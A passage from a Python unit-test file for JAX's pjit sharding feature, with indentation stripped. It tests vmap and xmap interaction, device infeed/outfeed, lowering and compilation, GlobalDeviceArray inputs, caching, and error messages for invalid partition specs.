y = pjit(lambda x: x * 2, in_axis_resources=spec, out_axis_resources=spec)(x)
self.assertAllClose(y, x * 2)
@jtu.with_mesh([('x', 2)])
def testVmapModifiesAxisResources(self):
h = pjit(lambda x, y: (x + y, x, y), in_axis_resources=P('x'), out_axis_resources=None)
x = jnp.arange(4)
y = jnp.arange(5*4).reshape((5, 4))
jaxpr = jax.make_jaxpr(jax.vmap(h, in_axes=(None, 0)))(x, y).jaxpr
eqn = jaxpr.eqns[0]
self.assertIs(eqn.primitive, pjit_p)
x_sync, y_sync = (spec.sync for spec in eqn.params['in_axis_resources'])
self.assertEqual(x_sync, SpecSync.IN_SYNC)
self.assertEqual(y_sync, SpecSync.DIM_PERMUTE)
x_sync, y_sync, z_sync = (spec.sync for spec in eqn.params['out_axis_resources'])
self.assertEqual(x_sync, SpecSync.DIM_PERMUTE)
self.assertEqual(y_sync, SpecSync.IN_SYNC)
self.assertEqual(z_sync, SpecSync.DIM_PERMUTE)
@jtu.with_mesh([('x', 2)])
def testVMap(self):
f = pjit(lambda x, y: (x + y, x), in_axis_resources=P('x'), out_axis_resources=P('x'))
x = jnp.arange(4)
y = jnp.arange(5*4).reshape((5, 4))
z, w = jax.vmap(f, in_axes=(None, 0), out_axes=(0, None))(x, y)
self.assertAllClose(z, x[jnp.newaxis] + y)
self.assertAllClose(w, x)
self.assertEqual(z.sharding_spec.sharding, (pxla.NoSharding(), pxla.Chunked([2])))
self.assertEqual(w.sharding_spec.sharding, (pxla.Chunked([2]),))
@jtu.with_mesh([('x', 2)])
def testVMapShardingConstraint(self):
f = pjit(lambda x: with_sharding_constraint(x, P('x')),
in_axis_resources=P(), out_axis_resources=P('x'))
x = jnp.arange(5*4).reshape((5, 4))
jaxpr = jax.make_jaxpr(jax.vmap(f))(x)
pjit_eqn, = jaxpr.eqns
constraint_eqn, = pjit_eqn.params['jaxpr'].eqns
self.assertEqual(constraint_eqn.params['axis_resources'].partitions, (None, ('x',)))
self.assertEqual(constraint_eqn.params['axis_resources'].sync, SpecSync.DIM_PERMUTE)
@jtu.with_mesh([('x', 2), ('y', 1)])
def testShardingInXMap(self):
h = pjit(lambda x: x, in_axis_resources=P('x'), out_axis_resources=None)
f = xmap(lambda x: h(x * 2), in_axes=['i', ...], out_axes=['i', ...],
axis_resources={'i': 'y'})
x = jnp.arange(16).reshape((4, 4))
rule = xla._translations[pjit_p]
test_rule_called = False
def _test_rule(*args, **kwargs):
nonlocal test_rule_called
test_rule_called = True
in_axis_resources = kwargs['in_axis_resources']
self.assertEqual(len(in_axis_resources), 1)
self.assertIn(('y',), in_axis_resources[0].partitions)
return rule(*args, **kwargs)
try:
xla._translations[pjit_p] = _test_rule
f(x)
self.assertTrue(test_rule_called)
finally:
xla._translations[pjit_p] = rule
@jtu.with_mesh([('x', 2)])
def testLowerWithDuckTyping(self):
x = jax.ShapeDtypeStruct((2, 2), jnp.float32)
# Make sure this doesn't crash
pjit(lambda x: x + 4,
in_axis_resources=P('x'), out_axis_resources=P('x')).lower(x)
@jtu.with_mesh([('x', 2)])
def testLowerDonateArgnumsAvailable(self):
x = jax.ShapeDtypeStruct((2, 2), jnp.float32)
def f(*args):
x, *_ = args
return x
f_low = pjit(f, donate_argnums=(0,),
in_axis_resources=P('x'), out_axis_resources=P('x')).lower(x)
f_com = f_low.compile()
f_low.donate_argnums == f_com.donate_argnums == (0,)
def testInfeed(self):
devices = np.array(jax.local_devices())
nr_devices = len(devices)
shape = (nr_devices * 3, nr_devices * 5)
def f_for_jit(x):
token = lax.create_token(x)
(y,), token = lax.infeed(
token, shape=(jax.ShapedArray(x.shape, np.float32),))
(z,), token = lax.infeed(
token, shape=(jax.ShapedArray(x.shape, np.float32),))
(w,), token = lax.infeed(
token, shape=(jax.ShapedArray(x.shape, np.float32),))
return x + y + z + w
x = np.arange(np.prod(shape), dtype=np.float32).reshape(shape)
y = x * 2.
z = x * 3.
w = x * 4.
# Transfer data to infeed before executing the function. For GPUs, the
# execution of the compiled function is blocking, so transferring data
# to infeed before executing ensures that the execution does not deadlock
# waiting for the infeed data.
logging.info('Transfering to infeed for the jit call')
d = devices[0]
d.transfer_to_infeed((y,))
d.transfer_to_infeed((z,))
d.transfer_to_infeed((w,))
# JIT
logging.info('Making jit call')
res0 = jax.jit(f_for_jit)(x)
self.assertAllClose(res0, x + y + z + w, check_dtypes=True)
# PJIT
def f_for_pjit(x):
token = lax.create_token(x)
# A replicated infeed
(y,), token = lax.infeed(
token,
shape=(jax.ShapedArray(x.shape, np.float32),),
partitions=(None,))
# An infeed sharded on first axis
(z,), token = lax.infeed(
token,
shape=(jax.ShapedArray(x.shape, np.float32),),
partitions=(P(nr_devices, 1),))
# An infeed sharded on second axis
(w,), token = lax.infeed(
token,
shape=(jax.ShapedArray(x.shape, np.float32),),
partitions=(P(1, nr_devices),))
return x + y + z + w
logging.info('Transfering to infeed for the pjit call')
for didx, d in enumerate(devices):
# Transfer the whole array to all devices for replicated.
d.transfer_to_infeed((y,))
# For sharded infeed, transfer only the needed slices to each device.
d.transfer_to_infeed((z[3 * didx:3 * didx + 3, :]))
d.transfer_to_infeed((w[:, 5 * didx:5 * didx + 5],))
with maps.Mesh(devices, ['d']):
logging.info('Making pjit call')
res = pjit(
f_for_pjit, in_axis_resources=(P('d'),), out_axis_resources=P('d'))(
x)
self.assertAllClose(res0, res, check_dtypes=True)
def testOutfeed(self):
devices = np.array(jax.local_devices())
nr_devices = len(devices)
shape = (nr_devices * 3, nr_devices * 5)
def f(x):
token = lax.create_token(x)
token = lax.outfeed(token, x, partitions=(None,))
token = lax.outfeed(token, x, partitions=(P(nr_devices, 1),))
token = lax.outfeed(token, x, partitions=(P(1, nr_devices),))
return x
x = np.arange(np.prod(shape), dtype=np.float32).reshape(shape)
def dispatch():
with maps.Mesh(devices, ['d']):
logging.info('Making pjit call')
pjit(f, in_axis_resources=(P('d'),), out_axis_resources=P('d'))(x)
execution = threading.Thread(target=dispatch)
execution.start()
def check_outfeed(d, x):
y, = d.transfer_from_outfeed(
xla_client.shape_from_pyval((x,)).with_major_to_minor_layout_if_absent())
self.assertAllClose(x, y, check_dtypes=True)
logging.info('Transfering from outfeed for the pjit call')
for didx, d in enumerate(devices):
# Transfer the whole array from all devices for replicated.
check_outfeed(d, x)
# For sharded outfeed, the results are sliced.
check_outfeed(d, x[3 * didx:3 * didx + 3, :])
check_outfeed(d, x[:, 5 * didx:5 * didx + 5])
execution.join()
@jtu.with_mesh([('x', 2)])
def testWithCustomPRNGKey(self):
if not config.jax_enable_custom_prng:
raise unittest.SkipTest("test requires jax_enable_custom_prng")
key = jax.prng.seed_with_impl(jax.prng.rbg_prng_impl, 87)
# Make sure this doesn't crash
pjit(lambda x: x, in_axis_resources=(None), out_axis_resources=(None))(key)
@jtu.with_mesh([('x', 2), ('y', 2)])
def testLowerCompile(self):
@partial(pjit,
in_axis_resources=P(('x', 'y'),),
out_axis_resources=P(('x', 'y'),))
def f(x, y):
return x @ y
shape = (8, 8)
x = jnp.arange(np.prod(shape)).reshape(shape)
expected = x @ (x + 1)
lowered = f.lower(x, x + 1)
compiled = lowered.compile()
actual = compiled(x, x + 1)
self.assertEqual(lowered.in_avals, compiled.in_avals)
self.assertEqual(
lowered.in_avals,
((jax.ShapedArray(x.shape, x.dtype, weak_type=False),) * 2, {}))
splits = np.split(expected, 4)
self.assertAllClose(actual.device_buffers[0].to_py(), splits[0],
check_dtypes=False)
self.assertAllClose(actual.device_buffers[1].to_py(), splits[1],
check_dtypes=False)
self.assertAllClose(actual.device_buffers[2].to_py(), splits[2],
check_dtypes=False)
self.assertAllClose(actual.device_buffers[3].to_py(), splits[3],
check_dtypes=False)
for obj in [lowered, compiled]:
self.assertTrue(obj._no_kwargs, True)
self.assertEqual(obj.in_tree, jax.tree_flatten(((0, 0), {}))[1])
@jtu.with_mesh([('x', 2), ('y', 2)])
def testLowerCompileWithKwargs(self):
@partial(pjit,
in_axis_resources=P(('x', 'y'),),
out_axis_resources=P(('x', 'y'),))
def f(x, y, **kwargs):
return x @ y
shape = (8, 8)
x = jnp.arange(np.prod(shape)).reshape(shape)
exe = f.lower(x, x + 1).compile()
self.assertRaisesRegex(
NotImplementedError,
"function was compiled by a transformation that does not support "
"keyword arguments, but called with keyword arguments: a, b",
lambda: exe(x, x + 1, a=1, b=2))
@jtu.with_mesh([('x', 2), ('y', 2)])
def testLowerCompileInTreeMismatch(self):
@partial(pjit,
in_axis_resources=P(('x', 'y'),),
out_axis_resources=P(('x', 'y'),))
def f(x, y):
return x @ y
shape = (8, 8)
x = jnp.arange(np.prod(shape)).reshape(shape)
exe = f.lower(x, x + 1).compile()
self.assertRaisesRegex(
TypeError, "function compiled for .*, called with .*",
lambda: exe([x], [x + 1]))
@jtu.with_mesh([('x', 2), ('y', 2)])
def testLowerCompileArgTypeMismatch(self):
@partial(pjit,
in_axis_resources=P(('x', 'y'),),
out_axis_resources=P(('x', 'y'),))
def f(x, y):
return x @ y
shape = (8, 8)
x = jnp.arange(np.prod(shape)).reshape(shape)
x_f32 = x.astype(jnp.float32)
x_i32 = x.astype(jnp.int32)
exe = f.lower(x_f32, x_f32).compile()
self.assertRaisesRegex(
TypeError,
"Computation compiled for input types:\n.*float32.*\n"
"called with:\n.*int32.*",
lambda: exe(x_i32, x_i32))
@jtu.with_mesh([('x', 2), ('y', 2)])
def testLowerCompilerIR(self):
@partial(pjit,
in_axis_resources=P(('x', 'y'),),
out_axis_resources=P(('x', 'y'),))
def f(x, y):
return x @ y
shape = (8, 8)
x = jnp.arange(np.prod(shape)).reshape(shape)
f = f.lower(x, x + 1)
self.assertIsNotNone(f.compiler_ir())
self.assertIsNotNone(f.compiler_ir(dialect='hlo'))
self.assertIsNotNone(f.compiler_ir(dialect='mhlo'))
@jtu.with_mesh([('x', 2), ('y', 2)])
def testLowerCompileCompilerIR(self):
@partial(pjit,
in_axis_resources=P(('x', 'y'),),
out_axis_resources=P(('x', 'y'),))
def f(x, y):
return x @ y
shape = (8, 8)
x = jnp.arange(np.prod(shape)).reshape(shape)
f = f.lower(x, x + 1).compile()
self.assertIsNotNone(f.compiler_ir())
@jtu.with_mesh([('x', 2), ('y', 2)])
def testLowerCompileExecutable(self):
@partial(pjit,
in_axis_resources=P(('x', 'y'),),
out_axis_resources=P(('x', 'y'),))
def f(x, y):
return x @ y
shape = (8, 8)
x = jnp.arange(np.prod(shape)).reshape(shape)
f = f.lower(x, x + 1).compile()
self.assertIsNotNone(f.runtime_executable())
@jtu.with_mesh([('x', 2)])
def test_static_argnums(self):
@partial(pjit, in_axis_resources=None, out_axis_resources=None,
static_argnums=(1,))
def f(x, y):
return x + (3 if y == 'hi' else 4)
self.assertEqual(f(1, 'hi' ), 4)
self.assertEqual(f(1, 'bye'), 5)
class GDAPjitTest(jtu.JaxTestCase):
@jtu.with_mesh([('x', 4), ('y', 2)])
def test_pjit_gda_single_output(self):
global_mesh = jtu.create_global_mesh((4, 2), ('x', 'y'))
global_input_shape = (8, 2)
mesh_axes = P('x', 'y')
input_data = np.arange(
prod(global_input_shape)).reshape(global_input_shape)
def cb(index):
return input_data[index]
gda_obj = global_device_array.GlobalDeviceArray.from_callback(
global_input_shape, global_mesh, mesh_axes, cb)
with jax._src.config.parallel_functions_output_gda(True):
@partial(pjit, in_axis_resources=FROM_GDA, out_axis_resources=P('x', 'y'))
def f(x):
return x @ x.T
expected_matrix_mul = input_data @ input_data.T
out = f(gda_obj)
self.assertIsInstance(out, global_device_array.GlobalDeviceArray)
self.assertEqual(out.shape, (8, 8))
self.assertEqual(out.local_shards[0].data.shape, (2, 4))
self.assertDictEqual(out.mesh.shape, {'x': 4, 'y': 2})
for s in out.local_shards:
self.assertArraysEqual(s.data, expected_matrix_mul[s.index])
out2 = f(out)
self.assertIsInstance(out2, global_device_array.GlobalDeviceArray)
with self.assertRaisesRegex(
ValueError, ('For a non-GDA input, the corresponding resource in '
'in_axis_resources cannot be `pjit.FROM_GDA`.')):
f(input_data)
def test_pjit_gda_single_output_with_mesh_context_manager(self):
global_mesh = jtu.create_global_mesh((4, 2), ('x', 'y'))
global_input_shape = (8, 2)
mesh_axes = P('x', 'y')
input_data = np.arange(
prod(global_input_shape)).reshape(global_input_shape)
def cb(index):
return input_data[index]
gda_obj = global_device_array.GlobalDeviceArray.from_callback(
global_input_shape, global_mesh, mesh_axes, cb)
with jax._src.config.parallel_functions_output_gda(True):
with global_mesh:
@partial(pjit, in_axis_resources=FROM_GDA, out_axis_resources=P('x', 'y'))
def f(x):
return x @ x.T
expected_matrix_mul = input_data @ input_data.T
out = f(gda_obj)
self.assertIsInstance(out, global_device_array.GlobalDeviceArray)
self.assertEqual(out.shape, (8, 8))
self.assertEqual(out.local_shards[0].data.shape, (2, 4))
self.assertDictEqual(out.mesh.shape, {'x': 4, 'y': 2})
for s in out.local_shards:
self.assertArraysEqual(s.data, expected_matrix_mul[s.index])
out2 = f(out)
self.assertIsInstance(out2, global_device_array.GlobalDeviceArray)
with self.assertRaisesRegex(
ValueError, ('For a non-GDA input, the corresponding resource in '
'in_axis_resources cannot be `pjit.FROM_GDA`.')):
f(input_data)
@jtu.with_mesh([('x', 4), ('y', 2)])
def test_pjit_gda_multi_input_multi_output(self):
global_mesh = jtu.create_global_mesh((4, 2), ('x', 'y'))
global_input_shape = (8, 2)
input_data = np.arange(
prod(global_input_shape)).reshape(global_input_shape)
def cb(index):
return input_data[index]
mesh_axes1 = P('x', 'y')
gda1 = global_device_array.GlobalDeviceArray.from_callback(
global_input_shape, global_mesh, mesh_axes1, cb)
mesh_axes2 = P('x')
gda2 = global_device_array.GlobalDeviceArray.from_callback(
global_input_shape, global_mesh, mesh_axes2, cb)
mesh_axes3 = P(('x', 'y'))
gda3 = global_device_array.GlobalDeviceArray.from_callback(
global_input_shape, global_mesh, mesh_axes3, cb)
mesh_axes4 = P(None)
gda4 = global_device_array.GlobalDeviceArray.from_callback(
global_input_shape, global_mesh, mesh_axes4, cb)
with jax._src.config.parallel_functions_output_gda(True):
@partial(
pjit,
# `FROM_GDA` will be replicated for all the inputs.
in_axis_resources=FROM_GDA,
out_axis_resources=(mesh_axes1, mesh_axes4, mesh_axes2, mesh_axes3))
def f(x, y, z, a):
return x @ x.T, y, z, a
out1, out2, out3, out4 = f(gda1, gda2, gda3, gda4)
self.assertIsInstance(out1, global_device_array.GlobalDeviceArray)
self.assertEqual(out1.shape, (8, 8))
self.assertEqual(out1.local_shards[0].data.shape, (2, 4))
self.assertEqual(out1.local_shards[0].index, (slice(0, 2), slice(0, 4)))
self.assertEqual(out1.local_shards[1].index, (slice(0, 2), slice(4, 8)))
self.assertListEqual([s.replica_id for s in out1.local_shards],
[0, 0, 0, 0, 0, 0, 0, 0])
expected_matrix_mul = input_data @ input_data.T
for s in out1.local_shards:
self.assertArraysEqual(s.data, expected_matrix_mul[s.index])
self.assertIsInstance(out2, global_device_array.GlobalDeviceArray)
self.assertEqual(out2.shape, (8, 2))
self.assertEqual(out2.local_shards[0].data.shape, (8, 2))
self.assertEqual(out2.local_shards[0].index, (slice(None), slice(None)))
self.assertEqual(out2.local_shards[1].index, (slice(None), slice(None)))
self.assertListEqual([s.replica_id for s in out2.local_shards],
[0, 1, 2, 3, 4, 5, 6, 7])
for s in out2.local_shards:
self.assertArraysEqual(s.data, input_data)
self.assertIsInstance(out3, global_device_array.GlobalDeviceArray)
self.assertEqual(out3.shape, (8, 2))
self.assertEqual(out3.local_shards[0].data.shape, (2, 2))
self.assertEqual(out3.local_shards[0].index, (slice(0, 2), slice(None)))
self.assertEqual(out3.local_shards[1].index, (slice(0, 2), slice(None)))
self.assertListEqual([s.replica_id for s in out3.local_shards],
[0, 1, 0, 1, 0, 1, 0, 1])
for s in out3.local_shards:
self.assertArraysEqual(s.data, input_data[s.index])
self.assertIsInstance(out4, global_device_array.GlobalDeviceArray)
self.assertEqual(out4.shape, (8, 2))
self.assertEqual(out4.local_shards[0].data.shape, (1, 2))
self.assertEqual(out4.local_shards[0].index, (slice(0, 1), slice(None)))
self.assertEqual(out4.local_shards[1].index, (slice(1, 2), slice(None)))
self.assertListEqual([s.replica_id for s in out4.local_shards],
[0, 0, 0, 0, 0, 0, 0, 0])
for s in out4.local_shards:
self.assertArraysEqual(s.data, input_data[s.index])
@jtu.with_mesh([('x', 4), ('y', 2)])
def test_pjit_gda_mixed_inputs(self):
global_mesh = jtu.create_global_mesh((4, 2), ('x', 'y'))
global_input_shape = (8, 2)
mesh_axes = P('x', 'y')
input_data = np.arange(
prod(global_input_shape)).reshape(global_input_shape)
def cb(index):
return input_data[index]
gda_obj = global_device_array.GlobalDeviceArray.from_callback(
global_input_shape, global_mesh, mesh_axes, cb)
with jax._src.config.parallel_functions_output_gda(True):
@partial(pjit,
in_axis_resources=(FROM_GDA, P('x', 'y')),
out_axis_resources=(P('x', 'y'), P(('x', 'y'))))
def f(x, y):
return x @ x.T, y @ y.T
expected_matrix_mul = input_data @ input_data.T
out1, out2 = f(gda_obj, input_data)
self.assertIsInstance(out1, global_device_array.GlobalDeviceArray)
self.assertEqual(out1.shape, (8, 8))
self.assertEqual(out1.local_shards[0].data.shape, (2, 4))
self.assertDictEqual(out1.mesh.shape, {'x': 4, 'y': 2})
for s in out1.local_shards:
self.assertArraysEqual(s.data, expected_matrix_mul[s.index])
self.assertIsInstance(out2, global_device_array.GlobalDeviceArray)
self.assertEqual(out2.shape, (8, 8))
self.assertEqual(out2.local_shards[0].data.shape, (1, 8))
self.assertDictEqual(out2.mesh.shape, {'x': 4, 'y': 2})
for s in out2.local_shards:
self.assertArraysEqual(s.data, expected_matrix_mul[s.index])
@jtu.with_mesh([('x', 4), ('y', 2)])
def test_pjit_gda_non_gda_inputs(self):
input_shape = (8, 2)
input_data = np.arange(prod(input_shape)).reshape(input_shape)
with jax._src.config.parallel_functions_output_gda(True):
@partial(pjit,
in_axis_resources=(None, P('x', 'y')),
out_axis_resources=(P('x', 'y'), P(('x', 'y'))))
def f(x, y):
return x @ x.T, y @ y.T
expected_matrix_mul = input_data @ input_data.T
out1, out2 = f(input_data, input_data)
self.assertIsInstance(out1, global_device_array.GlobalDeviceArray)
self.assertEqual(out1.shape, (8, 8))
self.assertEqual(out1.local_shards[0].data.shape, (2, 4))
self.assertDictEqual(out1.mesh.shape, {'x': 4, 'y': 2})
for s in out1.local_shards:
self.assertArraysEqual(s.data, expected_matrix_mul[s.index])
self.assertIsInstance(out2, global_device_array.GlobalDeviceArray)
self.assertEqual(out2.shape, (8, 8))
self.assertEqual(out2.local_shards[0].data.shape, (1, 8))
self.assertDictEqual(out2.mesh.shape, {'x': 4, 'y': 2})
for s in out2.local_shards:
self.assertArraysEqual(s.data, expected_matrix_mul[s.index])
@jtu.with_mesh([('x', 2), ('y', 2)])
def test_pjit_gda_mesh_mismatch(self):
global_mesh = jtu.create_global_mesh((4, 2), ('x', 'y'))
global_input_shape = (8, 2)
mesh_axes = P('x', 'y')
global_input_data = np.arange(
prod(global_input_shape), dtype=np.float32).reshape(global_input_shape)
def cb(index):
return global_input_data[index]
gda_obj = global_device_array.GlobalDeviceArray.from_callback(
global_input_shape, global_mesh, mesh_axes, cb)
with self.assertRaisesRegex(ValueError,
"Pjit's mesh and GDA's mesh should be equal."):
@partial(pjit, in_axis_resources=FROM_GDA, out_axis_resources=P('x', 'y'))
def f(x):
return x
f(gda_obj)
@jtu.with_mesh([('x', 4), ('y', 2)])
def test_pjit_gda_wrong_resource_for_gda_input(self):
global_mesh = jtu.create_global_mesh((4, 2), ('x', 'y'))
global_input_shape = (8, 2)
mesh_axes = P('x')
global_input_data = np.arange(
prod(global_input_shape), dtype=np.float32).reshape(global_input_shape)
def cb(index):
return global_input_data[index]
gda_obj = global_device_array.GlobalDeviceArray.from_callback(
global_input_shape, global_mesh, mesh_axes, cb)
with self.assertRaisesWithLiteralMatch(
ValueError,
"Got an input GDA to pjit with different partitioning than specified "
'in the in_axis_resources argument to pjit. The partitioning must '
'match, or use `jax.experimental.pjit.FROM_GDA` in `in_axis_resources`. '
"Got GDA spec: PartitionSpec('x',) and "
"pjit spec: PartitionSpec('x', 'y') "
'for GDA: GlobalDeviceArray(shape=(8, 2), dtype=float32)'):
@partial(pjit, in_axis_resources=P('x', 'y'), out_axis_resources=P('x', 'y'))
def f(x):
return x
f(gda_obj)
@jtu.with_mesh([('x', 4), ('y', 2)])
def test_pjit_gda_caching(self):
global_mesh = jtu.create_global_mesh((4, 2), ('x', 'y'))
input_shape = (8, 2)
mesh_axes = P('x', 'y')
input_data = np.arange(
prod(input_shape), dtype=np.float32).reshape(input_shape)
def cb(index):
return input_data[index]
gda_obj = global_device_array.GlobalDeviceArray.from_callback(
input_shape, global_mesh, mesh_axes, cb)
@partial(pjit, in_axis_resources=mesh_axes, out_axis_resources=P('x', 'y'))
def f(x, y):
return x @ y.T
before_lower_cache = pjit_lib._pjit_lower.cache_info()
f(gda_obj, gda_obj)
after_lower_cache1 = pjit_lib._pjit_lower.cache_info()
self.assertEqual(before_lower_cache.hits, after_lower_cache1.hits)
self.assertEqual(before_lower_cache.misses + 1, after_lower_cache1.misses)
f(gda_obj, gda_obj)
after_lower_cache2 = pjit_lib._pjit_lower.cache_info()
self.assertEqual(after_lower_cache1.hits + 1, after_lower_cache2.hits)
self.assertEqual(after_lower_cache1.misses, after_lower_cache2.misses)
f(input_data, input_data)
after_lower_cache3 = pjit_lib._pjit_lower.cache_info()
self.assertEqual(after_lower_cache2.hits, after_lower_cache3.hits)
self.assertEqual(after_lower_cache2.misses + 1, after_lower_cache3.misses)
f(gda_obj, input_data)
after_lower_cache4 = pjit_lib._pjit_lower.cache_info()
self.assertEqual(after_lower_cache3.hits, after_lower_cache4.hits)
self.assertEqual(after_lower_cache3.misses + 1, after_lower_cache4.misses)
@jtu.with_mesh([('x', 4), ('y', 2)])
def test_partition_spec_mismatch_semantically_equivalent(self):
global_mesh = jtu.create_global_mesh((4, 2), ('x', 'y'))
global_input_shape = (8, 2)
mesh_axes = P(None)
global_input_data = np.arange(
prod(global_input_shape), dtype=np.float32).reshape(global_input_shape)
def cb(index):
return global_input_data[index]
with jax._src.config.parallel_functions_output_gda(True):
gda_obj = global_device_array.GlobalDeviceArray.from_callback(
global_input_shape, global_mesh, mesh_axes, cb)
@partial(pjit, in_axis_resources=P(None), out_axis_resources=P(None))
def f(x):
return x
output_gda = f(gda_obj)
# Ensure output_gda.mesh_axes = P() is matched with P(None).
self.assertEqual(output_gda.mesh_axes, ())
# P(None) is in_axis_resources.
f(output_gda)
def test_from_gda_duplicates(self):
global_mesh = jtu.create_global_mesh((1, 2), ('x', 'y'))
global_input_shape = (8, 2)
mesh_axes = P('x', 'y')
input_gda = create_gda(global_input_shape, global_mesh, mesh_axes)
# It's occasionally possible to end up with two FROM_GDA singletons (e.g. if
# pickling in_axis_resources and sending to other processes). Make sure this
# this doesn't cause an error to avoid user confusion.
from_gda_dup = pjit_lib._FromGdaSingleton()
with maps.Mesh(global_mesh.devices, global_mesh.axis_names):
pjit(lambda x: x, in_axis_resources=from_gda_dup, out_axis_resources=None)(
input_gda)
def test_no_recompilation_due_to_in_axis_resources(self):
global_mesh = jtu.create_global_mesh((1, 2), ('x', 'y'))
global_input_shape = (8, 2)
mesh_axes = P(None,)
input_gda = create_gda(global_input_shape, global_mesh, mesh_axes)
with jax._src.config.parallel_functions_output_gda(True):
@partial(pjit, in_axis_resources=mesh_axes, out_axis_resources=mesh_axes)
def f(x):
return x
with global_mesh:
out_gda = f(input_gda)
self.assertEqual(out_gda.mesh_axes, ())
before_cache = pjit_lib._pjit_lower.cache_info()
f(out_gda)
after_cache = pjit_lib._pjit_lower.cache_info()
self.assertEqual(before_cache.hits + 1, after_cache.hits)
self.assertEqual(before_cache.misses, after_cache.misses)
def test_no_recompilation_due_to_fully_replicated_and_gda_inputs(self):
global_mesh = jtu.create_global_mesh((1, 2), ('x', 'y'))
global_input_shape = (8, 2)
mesh_axes = P(None)
global_data = np.arange(
prod(global_input_shape)).reshape(global_input_shape)
with jax._src.config.parallel_functions_output_gda(True):
f = pjit(lambda x: x, in_axis_resources=mesh_axes,
out_axis_resources=mesh_axes)
with global_mesh:
out_gda = f(global_data)
self.assertEqual(out_gda.mesh_axes, ())
before_cache = pjit_lib._pjit_lower.cache_info()
f(out_gda)
after_cache = pjit_lib._pjit_lower.cache_info()
self.assertEqual(before_cache.hits + 1, after_cache.hits)
self.assertEqual(before_cache.misses, after_cache.misses)
def spec_regex(s):
return str(s).replace(r"(", r"\(").replace(r")", r"\)")
class PJitErrorTest(jtu.JaxTestCase):
@check_1d_2d_mesh(set_mesh=True)
def testNonDivisibleArgs(self, mesh, resources):
x = jnp.ones((3, 2))
spec = P(resources, None)
mesh_size = str(np.prod([dim[1] for dim in mesh], dtype=np.int64))
with self.assertRaisesRegex(ValueError,
r"One of pjit arguments.*" + spec_regex(spec) + r".*"
r"implies that the size of its dimension 0 should be "
r"divisible by " + mesh_size + r", but it is equal to 3"):
pjit(lambda x: x, in_axis_resources=spec, out_axis_resources=None)(x)
@check_1d_2d_mesh(set_mesh=True)
def testNonDivisibleOuts(self, mesh, resources):
x = jnp.ones((3, 2))
spec = P(resources, None)
mesh_size = str(np.prod([dim[1] for dim in mesh], dtype=np.int64))
with self.assertRaisesRegex(ValueError,
r"One of pjit outputs.*" + spec_regex(spec) + r".*"
r"implies that the size of its dimension 0 should be "
r"divisible by " + mesh_size + r", but it is equal to 3"):
pjit(lambda x: x, in_axis_resources=None, out_axis_resources=P(resources, None))(x)
@check_1d_2d_mesh(set_mesh=False)
@jtu.with_mesh([('z', 1)])
def testUndefinedResourcesArgs(self, mesh, resources):
x = jnp.ones((2, 2))
spec = P(resources,)
with self.assertRaisesRegex(ValueError,
r"One of pjit arguments.*" + spec_regex(spec) + r", "
r"but resource axis x is undefined."):
pjit(lambda x: x, in_axis_resources=spec, out_axis_resources=None)(x)
@check_1d_2d_mesh(set_mesh=False)
@jtu.with_mesh([('z', 1)])
def testUndefinedResourcesOuts(self, mesh, resources):
x = jnp.ones((2, 2))
spec = P(resources,)
with self.assertRaisesRegex(ValueError,
r"One of pjit outputs.*" + spec_regex(spec) + r", "
r"but resource axis x is undefined."):
pjit(lambda x: x, in_axis_resources=None, out_axis_resources=spec)(x)
@check_1d_2d_mesh(set_mesh=False)
@jtu.with_mesh([('z', 1)])
def testUndefinedResourcesConstraint(self, mesh, resources):
x = jnp.ones((2, 2))
spec = P(resources,)
with self.assertRaisesRegex(ValueError,
r"One of with_sharding_constraint arguments"
r".*" + spec_regex(spec) + r", but resource axis "
r"x is undefined."):
pjit(lambda x: with_sharding_constraint(x, spec),
in_axis_resources=None, out_axis_resources=None)(x)
@jtu.with_mesh([('x', 2), ('y', 1)])
def testRankTooLowArgs(self):
x = jnp.arange(2)
spec = P('x', 'y')
error = (r"One of pjit arguments.*" + spec_regex(spec) + r", which implies "
r"that it has a rank of at least 2, but it is 1")
with self.assertRaisesRegex(ValueError, error):
pjit(lambda x: x.sum(), in_axis_resources=spec, out_axis_resources=None)(x)
@jtu.with_mesh([('x', 2), ('y', 1)])
def testRankTooLowArgsAxisResourcesNone(self):
x = jnp.arange(2)
spec = P(None, None)
error = (r"One of pjit arguments.*" + spec_regex(spec) + r", which implies "
r"that it has a rank of at least 2, but it is 1")
with self.assertRaisesRegex(ValueError, error):
pjit(lambda x: x.sum(), in_axis_resources=spec, out_axis_resources=None)(x)
@jtu.with_mesh([('x', 2), ('y', 1)])
def testRankTooLowOuts(self):
x = jnp.arange(2)
spec = P('x', 'y')
error = (r"One of pjit outputs.*" + spec_regex(spec) + r", which implies "
r"that it has a rank of at least 2, but it is 0")
with self.assertRaisesRegex(ValueError, error):
pjit(lambda x: x.sum(), in_axis_resources=None, out_axis_resources=spec)(x)
@jtu.with_mesh([('x', 2), ('y', 1)])
def testRankTooLowConstraint(self):
x = jnp.arange(2)
spec = P('x', 'y')
error = (r"One of with_sharding_constraint arguments " +
r"was given.*" + spec_regex(spec) + r", which implies "
r"that it has a rank of at least 2, but it is 1")
with self.assertRaisesRegex(ValueError, error):
pjit(lambda x: with_sharding_constraint(x, spec),
in_axis_resources=None, out_axis_resources=None)(x)
@jtu.with_mesh([('x', 2), ('y', 1)])
def testRepeatedInResources(self):
x = jnp.arange(2)
for spec in [P('x', 'x'), P('x', ('y', 'x'))]:
error = (r"A single in_axis_resources specification can map every mesh "
r"axis to at most one positional dimension, but " +
spec_regex(spec) + " has duplicate entries for `x`")
with self.assertRaisesRegex(ValueError, error):
pjit(lambda x: x, in_axis_resources=spec, out_axis_resources=None)(x)
@jtu.with_mesh([('x', 2), ('y', 1)])
def testRepeatedOutResources(self):
x = jnp.arange(2)
for spec in [P('x', 'x'), P('x', ('y', 'x'))]:
error = (r"A single out_axis_resources specification can map every mesh "
r"axis to at most one positional dimension, but " +
spec_regex(spec) + " has duplicate entries for `x`")
with self.assertRaisesRegex(ValueError, error):
pjit(lambda x: x, in_axis_resources=None, out_axis_resources=spec)(x)
@jtu.with_mesh([('x', 2)])
def testInputShardsXMapAxis(self):
spec = P('x')
f = xmap(pjit(lambda x: x + 2, in_axis_resources=spec, out_axis_resources=None),
in_axes=['i', ...], out_axes=['i', ...], axis_resources={'i': 'x'})
x = jnp.arange(4).reshape((2, 2))
error = (r"pjit input has an axis resources specification of " +
spec_regex(spec) + r" that uses one or more mesh axes already used by "
r"xmap to partition a named axis appearing in its named_shape \(both "
r"use mesh axes `x`\)")
with self.assertRaisesRegex(JAXTypeError, error):
f(x)
@jtu.with_mesh([('x', 2)])
def testOutputShardsXMapAxis(self):
spec = P('x')
f = xmap(pjit(lambda x: x + 2, in_axis_resources=None, out_axis_resources=spec),
